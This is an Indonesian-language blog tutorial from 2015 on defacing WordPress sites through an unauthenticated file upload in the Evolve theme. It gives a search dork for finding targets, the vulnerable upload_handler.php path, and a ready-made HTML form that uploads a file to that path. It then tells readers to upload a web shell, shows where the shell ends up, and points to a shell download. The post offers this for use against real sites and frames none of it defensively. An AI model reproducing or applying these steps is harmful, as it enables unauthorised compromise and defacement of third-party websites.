23 July 2015
Hallow semua
Ketemu lagi dengan saya, kali saya akan memberi tutorial deface, sesuai judul di atas, langsung aja
Author : Indonesian Cyber Freedom
Dork : inurl:/wp-content/themes/evolve/js/ ( Bisa ente kembangkan lagi )
Exploit : /wp-content/themes/evolve/js/back-end/libraries/fileuploader/upload_handler.php
Code CSRF :
<form enctype="multipart/form-data"
action="target.com/wp-content/themes/evolve/js/back-end/libraries/fileuploader/upload_handler.php" method="post">
Your File: <input name="qqfile" type="file" /><br />
<input type="submit" value="upload" />
</form>
Cari target dengan menggunakan dork
klau vuln muncul seperti gambar seperti di bawah ini :
Buka code CSRF nya :
Buka CSRF tadi di browser ente, upload shell, klau berhasil akan seperti ini :
Shell access : http://site.com/wp-content/uploads/years/month/shell.php
Klau ada yg blom pnya shell, bisa download di sini
Download Priv8 Shania Shell
Sekian dan terima kasih =)
Source :
Visit our forum
Subscribe to:
Post Comments (Atom)
0 comments